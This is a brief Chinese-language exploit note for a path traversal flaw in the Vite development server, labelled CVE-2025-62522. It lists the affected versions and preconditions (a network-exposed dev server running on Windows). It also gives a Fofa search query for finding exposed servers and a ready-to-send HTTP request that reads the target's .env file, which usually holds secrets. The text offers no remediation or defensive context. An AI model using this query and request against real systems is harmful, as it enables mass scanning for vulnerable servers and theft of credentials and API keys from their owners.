VITE-CVE-2025-62522-路径穿越
Fofa:body="/@vite/client"
漏洞利用前提
- 显式地将 Vite 开发服务器公开给网络(使用 --host 或 ``config 选项)
- 在 Windows 上运行开发服务
影响版本
>=7.1.0,<=7.1.10
>=7.0.0,<=7.0.7
>=6.0.0,<=6.4.0
>=2.9.18,<3.0.0,>=3.2.9,<4.0.0,>=4.5.3,<5.0.0,>=5.2.6,<=5.4.20
poc
GET /.env/\ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
